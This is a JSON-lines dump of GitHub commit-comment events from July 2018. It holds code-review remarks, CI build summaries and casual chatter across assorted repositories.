{"id":"7940121663","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29647798,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-09T21:10:42Z","updated_at":"2018-07-09T21:10:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T21:10:42Z"}
{"id":"7940125938","type":"CommitCommentEvent","actor":{"login":"patrikja"},"repo":{"name":"juliajansson/DSL"},"payload":{"comment":{"id":29647809,"position":18,"line":18,"path":"Kap1/Ex14.hs","commit_id":"4bd352e1d13a60c9c59c791a78e9a0e8c4f504a3","created_at":"2018-07-09T21:11:39Z","updated_at":"2018-07-09T21:11:39Z","author_association":"NONE","body":"equalityUpTo f x y  =  (f x) == (f y)\r\n\r\nTypical example: equality up to (`mod` n) means equality modulo n\r\n"}},"created_at":"2018-07-09T21:11:39Z"}
{"id":"7940128066","type":"CommitCommentEvent","actor":{"login":"ChowderII"},"repo":{"name":"ChowderII/CKeyword"},"payload":{"comment":{"id":29647815,"position":null,"line":null,"path":null,"commit_id":"86b348b728267a0e43bc027f86bf600777ba9d3c","created_at":"2018-07-09T21:12:07Z","updated_at":"2018-07-09T21:12:07Z","author_association":"OWNER","body":"Commits were done by the same person. I will test a few commits to allow myself to commit as one person ..."}},"created_at":"2018-07-09T21:12:07Z"}
{"id":"7940131073","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29647824,"position":null,"line":null,"path":null,"commit_id":"735c9cf71fa4f6f9b92285d9fd716aa9c27fed82","created_at":"2018-07-09T21:12:47Z","updated_at":"2018-07-09T21:12:47Z","author_association":"COLLABORATOR","body":"Looks like that hanging parentheses on line 13 is still a problem. Also, I realize this was for the specific equation y'=y*t but maybe you could add a function so that you could do any first order differential equation."}},"created_at":"2018-07-09T21:12:47Z"}
{"id":"7940131598","type":"CommitCommentEvent","actor":{"login":"EbenezerGH"},"repo":{"name":"web3j/web3j"},"payload":{"comment":{"id":29647828,"position":4,"line":80,"path":"utils/src/main/java/org/web3j/utils/Numeric.java","commit_id":"8480736f56fc69ed571f977a9da42fe24c1d3418","created_at":"2018-07-09T21:12:54Z","updated_at":"2018-07-09T21:12:54Z","author_association":"NONE","body":"kekeke"}},"created_at":"2018-07-09T21:12:54Z"}
{"id":"7940132287","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29647830,"position":18,"line":2375,"path":"sql/scriptdev2/scriptdev2.sql","commit_id":"28e4abf66a62996a4cf00c9e54701f7f20cddf6c","created_at":"2018-07-09T21:13:04Z","updated_at":"2018-07-09T21:13:04Z","author_association":"CONTRIBUTOR","body":"Its possible, this is one of my earlier scripts made from videos. @Saltgurka can you please check the string?"}},"created_at":"2018-07-09T21:13:04Z"}
{"id":"7940135041","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/GoogleMapsAPI"},"payload":{"comment":{"id":29647837,"position":null,"line":null,"path":null,"commit_id":"40af8c704c4f8244f2271e7883289cbc121a55d9","created_at":"2018-07-09T21:13:40Z","updated_at":"2018-07-09T21:13:40Z","author_association":"OWNER","body":"<img width=\"1425\" alt=\"screen shot 2018-07-09 at 4 13 13 pm\" src=\"https://user-images.githubusercontent.com/13053013/42476272-0818baa6-8393-11e8-99f8-904b6037fd32.png\">\r\n"}},"created_at":"2018-07-09T21:13:40Z"}
{"id":"7940136523","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/GoogleMapsAPI"},"payload":{"comment":{"id":29647840,"position":null,"line":null,"path":null,"commit_id":"e91fa0c26b1aec2cb00bd3d019c9061a9ae7a360","created_at":"2018-07-09T21:13:59Z","updated_at":"2018-07-09T21:13:59Z","author_association":"OWNER","body":"<img width=\"698\" alt=\"screen shot 2018-07-09 at 1 15 13 pm\" src=\"https://user-images.githubusercontent.com/13053013/42476283-12a6a5c8-8393-11e8-9e75-75d8ecb98790.png\">\r\n"}},"created_at":"2018-07-09T21:13:59Z"}
{"id":"7940142767","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647854,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T21:15:22Z","updated_at":"2018-07-09T21:15:22Z","author_association":"MEMBER","body":"Oh, so it's completely separate from this? https://youtu.be/PMvcTX-DUT8?t=9m1s"}},"created_at":"2018-07-09T21:15:22Z"}
{"id":"7940143631","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29647856,"position":null,"line":null,"path":null,"commit_id":"cc014e9f507f3c2b3e5dcb2395b0426852660da0","created_at":"2018-07-09T21:15:34Z","updated_at":"2018-07-09T21:15:34Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-318](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-318).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-318-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T21:15:34Z"}
{"id":"7940146931","type":"CommitCommentEvent","actor":{"login":"khalil5555"},"repo":{"name":"apache/cordova-windows"},"payload":{"comment":{"id":29647862,"position":10,"line":40,"path":"README.md","commit_id":"8cc627b8f5fb4a0959c4ef7a5994a4f358215fd6","created_at":"2018-07-09T21:16:15Z","updated_at":"2018-07-09T21:16:15Z","author_association":"NONE","body":"![future-](https://user-images.githubusercontent.com/34990360/42476346-51751ecc-83d6-11e8-9b6a-1359cf079d10.jpg)\r\n"}},"created_at":"2018-07-09T21:16:15Z"}
{"id":"7940151575","type":"CommitCommentEvent","actor":{"login":"rolandoisidoro"},"repo":{"name":"rolandoisidoro/zf-twbs-helper-module"},"payload":{"comment":{"id":29647873,"position":null,"line":null,"path":null,"commit_id":"ae34dcca7a62c85587ecedcf380b9513d26cfc65","created_at":"2018-07-09T21:17:18Z","updated_at":"2018-07-09T21:17:18Z","author_association":"OWNER","body":"Sync PL from original repository."}},"created_at":"2018-07-09T21:17:18Z"}
{"id":"7940152192","type":"CommitCommentEvent","actor":{"login":"gkostka"},"repo":{"name":"jako-tako-to-max/fuszerki"},"payload":{"comment":{"id":29647874,"position":4,"line":4,"path":"cpp/mutex_dawno_temu.cpp","commit_id":"ba47d58875bcd8b73bc250b623133bea5a8bbe64","created_at":"2018-07-09T21:17:26Z","updated_at":"2018-07-09T21:17:26Z","author_association":"NONE","body":"Formatowanie przynajmniej przyzwoite. No i funkca zawsze się powodzi. To już coś!"}},"created_at":"2018-07-09T21:17:26Z"}
{"id":"7940154390","type":"CommitCommentEvent","actor":{"login":"gkostka"},"repo":{"name":"jako-tako-to-max/fuszerki"},"payload":{"comment":{"id":29647880,"position":39,"line":39,"path":"cpp/mutex_dawno_temu.cpp","commit_id":"ba47d58875bcd8b73bc250b623133bea5a8bbe64","created_at":"2018-07-09T21:17:56Z","updated_at":"2018-07-09T21:17:56Z","author_association":"NONE","body":"Średniczek :-1: "}},"created_at":"2018-07-09T21:17:56Z"}
{"id":"7940156232","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/hearthis"},"payload":{"comment":{"id":29647882,"position":null,"line":null,"path":null,"commit_id":"06534f95113c5258044af4a80829cab4887a4f90","created_at":"2018-07-09T21:18:21Z","updated_at":"2018-07-09T21:18:21Z","author_association":"NONE","body":"TeamCity HearThis :: HearThis pull requests [Build *.*.44.06534f95113c5258044af4a80829cab4887a4f90](http://build.palaso.org/viewLog.html?buildId=124492&buildTypeId=HearThis_HearThisPullRequests) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:12"}},"created_at":"2018-07-09T21:18:21Z"}
{"id":"7940157726","type":"CommitCommentEvent","actor":{"login":"ermik"},"repo":{"name":"uNetworking/uWebSockets-bindings"},"payload":{"comment":{"id":29647884,"position":null,"line":null,"path":null,"commit_id":"95e44dba351ed8e6d91aa559d4bb9bb539e1c681","created_at":"2018-07-09T21:18:41Z","updated_at":"2018-07-09T21:18:41Z","author_association":"NONE","body":"Are any docs regarding removal of http.h? It used to be `httpsServer` was passed to uws.Server constructor; now that seems to no longer be the case. @dyatlov perhaps, you have come across a list of options the constructor accepts?"}},"created_at":"2018-07-09T21:18:41Z"}
{"id":"7940167150","type":"CommitCommentEvent","actor":{"login":"ibawt"},"repo":{"name":"xldenis/ill"},"payload":{"comment":{"id":29647896,"position":null,"line":null,"path":null,"commit_id":"d60d6d0e6b3bf84d2b7b8f980f1c6db5422058d1","created_at":"2018-07-09T21:20:46Z","updated_at":"2018-07-09T21:20:46Z","author_association":"NONE","body":"the beastie boys are sad"}},"created_at":"2018-07-09T21:20:46Z"}
{"id":"7940174017","type":"CommitCommentEvent","actor":{"login":"mrzechonek"},"repo":{"name":"jako-tako-to-max/fuszerki"},"payload":{"comment":{"id":29647908,"position":null,"line":null,"path":null,"commit_id":"ba47d58875bcd8b73bc250b623133bea5a8bbe64","created_at":"2018-07-09T21:22:14Z","updated_at":"2018-07-09T21:22:14Z","author_association":"CONTRIBUTOR","body":"Czy ktoś tu prosił o review? :trollface: "}},"created_at":"2018-07-09T21:22:14Z"}
{"id":"7940174444","type":"CommitCommentEvent","actor":{"login":"patrikja"},"repo":{"name":"juliajansson/DSL"},"payload":{"comment":{"id":29647909,"position":6,"line":6,"path":"Kap1/Ex12.hs","commit_id":"bc3228cdbe744381e3b71e8962bbaa08ba953b9f","created_at":"2018-07-09T21:22:20Z","updated_at":"2018-07-09T21:22:20Z","author_association":"NONE","body":"It looks general to me., not just an example."}},"created_at":"2018-07-09T21:22:20Z"}
{"id":"7940174615","type":"CommitCommentEvent","actor":{"login":"mstroink"},"repo":{"name":"TomWis97/SlimmeMeterAPI-client"},"payload":{"comment":{"id":29647910,"position":6,"line":59,"path":"SlimmeMeterAPI-client/index.html","commit_id":"49015d0735aa7b9681d7fd3df00f1284d3df4b94","created_at":"2018-07-09T21:22:21Z","updated_at":"2018-07-09T21:22:21Z","author_association":"NONE","body":"😆 "}},"created_at":"2018-07-09T21:22:21Z"}
{"id":"7940176613","type":"CommitCommentEvent","actor":{"login":"mrzechonek"},"repo":{"name":"jako-tako-to-max/fuszerki"},"payload":{"comment":{"id":29647915,"position":41,"line":41,"path":"cpp/mutex_dawno_temu.cpp","commit_id":"ba47d58875bcd8b73bc250b623133bea5a8bbe64","created_at":"2018-07-09T21:22:47Z","updated_at":"2018-07-09T21:22:47Z","author_association":"CONTRIBUTOR","body":"^ ten średniczek lepszy"}},"created_at":"2018-07-09T21:22:47Z"}
{"id":"7940179679","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29647917,"position":null,"line":null,"path":null,"commit_id":"7e0f16e5d1dd0dc4abe219dfe3b4eeb486191280","created_at":"2018-07-09T21:23:30Z","updated_at":"2018-07-09T21:23:30Z","author_association":"COLLABORATOR","body":"You're right about this being a bit tricky. There are really two options that I think could work. \r\n\r\n1. You use np.diff, which computes the difference between two different values in an array. So np.diff([1,2,4])=[1,2]. In this case you would choose values close to the point in question and then do np.diff of the y values of np.diff of the x values.\r\n\r\n2. Do the same thing as 1, but code it up yourself instead of using np.diff.\r\n\r\nThere are possibly some other ways, but for the sake of simplicity I only included the two above. I would recommend using 1. \r\n "}},"created_at":"2018-07-09T21:23:30Z"}
{"id":"7940180974","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29647920,"position":null,"line":null,"path":null,"commit_id":"7e0f16e5d1dd0dc4abe219dfe3b4eeb486191280","created_at":"2018-07-09T21:23:48Z","updated_at":"2018-07-09T21:23:48Z","author_association":"COLLABORATOR","body":"Also, your derivative function is returning f instead of deriv."}},"created_at":"2018-07-09T21:23:48Z"}
{"id":"7940203954","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29647973,"position":10,"line":6,"path":"src/components/Dashboard.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:28:59Z","updated_at":"2018-07-09T21:28:59Z","author_association":"COLLABORATOR","body":"Lets keep things simple for start and then we can refactor out some components."}},"created_at":"2018-07-09T21:28:59Z"}
{"id":"7940204328","type":"CommitCommentEvent","actor":{"login":"astrolabesun"},"repo":{"name":"astrolabesun/CSCB58_Labs"},"payload":{"comment":{"id":29647975,"position":null,"line":null,"path":null,"commit_id":"13ad85a79eb555088d7c50320378a1cbffb8c46e","created_at":"2018-07-09T21:29:04Z","updated_at":"2018-07-09T21:29:04Z","author_association":"OWNER","body":"This is only the starter code. Still determining how to write the rest to make this work."}},"created_at":"2018-07-09T21:29:04Z"}
{"id":"7940208417","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648026,"position":23,"line":13,"path":"src/components/Dashboard.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:30:00Z","updated_at":"2018-07-09T21:30:00Z","author_association":"COLLABORATOR","body":"Lets check if we have a token in local storage and dispatch the appropriate action accordingly."}},"created_at":"2018-07-09T21:30:00Z"}
{"id":"7940210663","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648032,"position":4,"line":8,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:30:30Z","updated_at":"2018-07-09T21:30:30Z","author_association":"NONE","body":"this number (4) is SoC dependent.\r\n\r\nAnd can you confirm its matches task pool strategy?"}},"created_at":"2018-07-09T21:30:30Z"}
{"id":"7940213906","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648039,"position":77,"line":50,"path":"src/components/Dashboard.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:31:11Z","updated_at":"2018-07-09T21:31:11Z","author_association":"COLLABORATOR","body":"We can pass `getToken` in as a prop since it is a simple function and not an action which the store needs to dispatch."}},"created_at":"2018-07-09T21:31:11Z"}
{"id":"7940220503","type":"CommitCommentEvent","actor":{"login":"WazzaMo"},"repo":{"name":"NielZeeman/node-arduino-firmata"},"payload":{"comment":{"id":29648055,"position":null,"line":null,"path":null,"commit_id":"6ba99f92d5fa83486979fe95043a6b1e41cbcece","created_at":"2018-07-09T21:32:42Z","updated_at":"2018-07-09T21:32:42Z","author_association":"NONE","body":"@NielZeeman @shokai is it possible to get a pull request with this going back into the original arduino-firmata repo? And then can a new build be published to NPM, Please?\r\n\r\nNPM is still picking up the old version and it's broken because the NPM version doesn't have this fix."}},"created_at":"2018-07-09T21:32:42Z"}
{"id":"7940221039","type":"CommitCommentEvent","actor":{"login":"dmitriu098"},"repo":{"name":"dmitriu098/Ur13-file"},"payload":{"comment":{"id":29648059,"position":null,"line":null,"path":null,"commit_id":"93efacff8b30c05cd0a0a24f9e81012b60d9edf3","created_at":"2018-07-09T21:32:50Z","updated_at":"2018-07-09T21:32:50Z","author_association":"OWNER","body":"Задание№1 "}},"created_at":"2018-07-09T21:32:50Z"}
{"id":"7940221146","type":"CommitCommentEvent","actor":{"login":"richardhendricks"},"repo":{"name":"GTNewHorizons/StandardQuestingPack"},"payload":{"comment":{"id":29648060,"position":null,"line":null,"path":null,"commit_id":"95c435e9b7415ea4be4eea74e9ccc4ef9b940161","created_at":"2018-07-09T21:32:51Z","updated_at":"2018-07-09T21:32:51Z","author_association":"COLLABORATOR","body":"I think we are OK with this."}},"created_at":"2018-07-09T21:32:51Z"}
{"id":"7940222310","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648061,"position":85,"line":53,"path":"src/components/Dashboard.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:33:08Z","updated_at":"2018-07-09T21:33:08Z","author_association":"COLLABORATOR","body":"This is a simpler approach for using mapDispatchToProps.  Also note that I am using just a single [container](https://redux.js.org/basics/usage-with-react#presentational-and-container-components) component here.  I try to use as few container components as possible in applications and keep simple presentational components for the rest."}},"created_at":"2018-07-09T21:33:08Z"}
{"id":"7940222937","type":"CommitCommentEvent","actor":{"login":"IUSR"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29648063,"position":null,"line":null,"path":null,"commit_id":"0cff66522337fc0b57dd26e4b6db2b57874a0537","created_at":"2018-07-09T21:33:16Z","updated_at":"2018-07-09T21:33:16Z","author_association":"NONE","body":"This seems to have broken prelude since it still references `projectile-global-mode`: https://github.com/bbatsov/prelude/blob/master/core/prelude-editor.el#L258 . Am I just caught in the middle of a series of changes/release? lol"}},"created_at":"2018-07-09T21:33:16Z"}
{"id":"7940225561","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648070,"position":19,"line":11,"path":"src/components/Dashboard.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:33:55Z","updated_at":"2018-07-09T21:33:55Z","author_association":"COLLABORATOR","body":"This export is a trick so we can use the simple component in tests without needing to handle all the Redux connect logic."}},"created_at":"2018-07-09T21:33:55Z"}
{"id":"7940227363","type":"CommitCommentEvent","actor":{"login":"Kibza"},"repo":{"name":"Kibza/Test1"},"payload":{"comment":{"id":29648073,"position":null,"line":null,"path":null,"commit_id":"e97a46c115bd747fc899bd21c7777d92d891e9c9","created_at":"2018-07-09T21:34:19Z","updated_at":"2018-07-09T21:34:19Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-09T21:34:19Z"}
{"id":"7940229100","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648077,"position":48,"line":35,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:34:44Z","updated_at":"2018-07-09T21:34:44Z","author_association":"NONE","body":"Seatch->search?"}},"created_at":"2018-07-09T21:34:44Z"}
{"id":"7940229838","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29648078,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-09T21:34:54Z","updated_at":"2018-07-09T21:34:54Z","author_association":"MEMBER","body":"If someone wants to try network multiplayer on Android:\r\n- install current Supertuxkart Beta from google play (git20180709)\r\n- find the config.xml file (it may be in /sdcard/Android/data/org.supertuxkart.stk or similar location)\r\n- change ```<commandline value=\"\" />``` to ```<commandline value=\"--online\" />```\r\n"}},"created_at":"2018-07-09T21:34:54Z"}
{"id":"7940229976","type":"CommitCommentEvent","actor":{"login":"gusgorman402"},"repo":{"name":"gusgorman402/3D_proteins"},"payload":{"comment":{"id":29648079,"position":null,"line":null,"path":null,"commit_id":"7cd0b24c0f8418350e5eb3df451f7667782dcd7e","created_at":"2018-07-09T21:34:57Z","updated_at":"2018-07-09T21:34:57Z","author_association":"OWNER","body":"HIV-1 Reverse Transcriptase (1REV) PDB structure"}},"created_at":"2018-07-09T21:34:57Z"}
{"id":"7940231779","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648081,"position":1,"line":1,"path":"src/components/LoginForm.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:35:21Z","updated_at":"2018-07-09T21:35:21Z","author_association":"COLLABORATOR","body":"I have simplified this component for now for clarity.  We can add in some more validation logic later and discuss the best options for form validation."}},"created_at":"2018-07-09T21:35:21Z"}
{"id":"7940233208","type":"CommitCommentEvent","actor":{"login":"Akshay-Venkatesh"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29648084,"position":215,"line":215,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_cache.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-09T21:35:42Z","updated_at":"2018-07-09T21:35:42Z","author_association":"NONE","body":"Is it possible that by applying alignments through ```ucs_align_down_pow2 / ucs_align_up_pow2```, that two regions have overlapping spaces? If that's the case, then what is the association rule for memhandles? There should be just one cuda memhandle per region. Lemme know if my understanding of region correct, and my earlier question makes any sense now. \r\nAlso, why should we apply aligning in the first place? Why not just use ```region->super.start``` and ```region->super.end``` as ```key->d_bptr``` and ```key->d_bptr + key->b_len```?"}},"created_at":"2018-07-09T21:35:42Z"}
{"id":"7940240649","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29648096,"position":null,"line":null,"path":null,"commit_id":"7d69d17cd65025bba233da02894c3fecebe775ca","created_at":"2018-07-09T21:37:28Z","updated_at":"2018-07-09T21:37:28Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/7d69d17cd65025bba233da02894c3fecebe775ca)\n\nBuilt at __20180709 - 21:37:28__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 568s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1239s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/coverage.txt) | 1035 cases, 0 failed, t: 688s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 803s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 515s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 253s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 241s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 498s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 247s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 442s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 338s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 355s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-ipvflag/4//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 249s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-09T21:37:28Z"}
{"id":"7940240719","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648097,"position":2,"line":2,"path":"src/reducers/Reducer.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:37:29Z","updated_at":"2018-07-09T21:37:29Z","author_association":"COLLABORATOR","body":"Again, please review the redux [docs](https://redux.js.org/basics/actions) in more detail.  I think there is some confusion for you surrounding action creators and action types.  We can discuss this in more detail but the reducer really only needs to know about the action types."}},"created_at":"2018-07-09T21:37:29Z"}
{"id":"7940240874","type":"CommitCommentEvent","actor":{"login":"lnovy"},"repo":{"name":"mjmacleod/yiimp"},"payload":{"comment":{"id":29648099,"position":8,"line":401,"path":"stratum/coind_template.cpp","commit_id":"220e14ef898d641f98a95e404be348b7350950dd","created_at":"2018-07-09T21:37:32Z","updated_at":"2018-07-09T21:37:32Z","author_association":"NONE","body":"this will crash the pool, preallocate the space in the template type definition statically and copy the value there."}},"created_at":"2018-07-09T21:37:32Z"}
{"id":"7940241329","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648100,"position":57,"line":44,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:37:39Z","updated_at":"2018-07-09T21:37:39Z","author_association":"NONE","body":"ssigned?? why 4?"}},"created_at":"2018-07-09T21:37:39Z"}
{"id":"7940243210","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29648105,"position":null,"line":null,"path":null,"commit_id":"1df948b625803de654083b3830e8ab9a519f988e","created_at":"2018-07-09T21:38:07Z","updated_at":"2018-07-09T21:38:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-319](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-319).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-319-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T21:38:07Z"}
{"id":"7940243713","type":"CommitCommentEvent","actor":{"login":"leyssae"},"repo":{"name":"leyssae/learn_ruby_rspec"},"payload":{"comment":{"id":29648106,"position":null,"line":null,"path":null,"commit_id":"a996becd404b8aad26daf854c24c36ee8a443737","created_at":"2018-07-09T21:38:13Z","updated_at":"2018-07-09T21:38:13Z","author_association":"OWNER","body":"+// THP \\\\ Projet fait avec Lise Chambers ~ Projet complété jusqu'au début du Simon_Says"}},"created_at":"2018-07-09T21:38:13Z"}
{"id":"7940247516","type":"CommitCommentEvent","actor":{"login":"ChowderII"},"repo":{"name":"ChowderII/CKeyword"},"payload":{"comment":{"id":29648116,"position":null,"line":null,"path":null,"commit_id":"86b348b728267a0e43bc027f86bf600777ba9d3c","created_at":"2018-07-09T21:39:06Z","updated_at":"2018-07-09T21:39:06Z","author_association":"OWNER","body":"The right account is now reflected in commits."}},"created_at":"2018-07-09T21:39:06Z"}
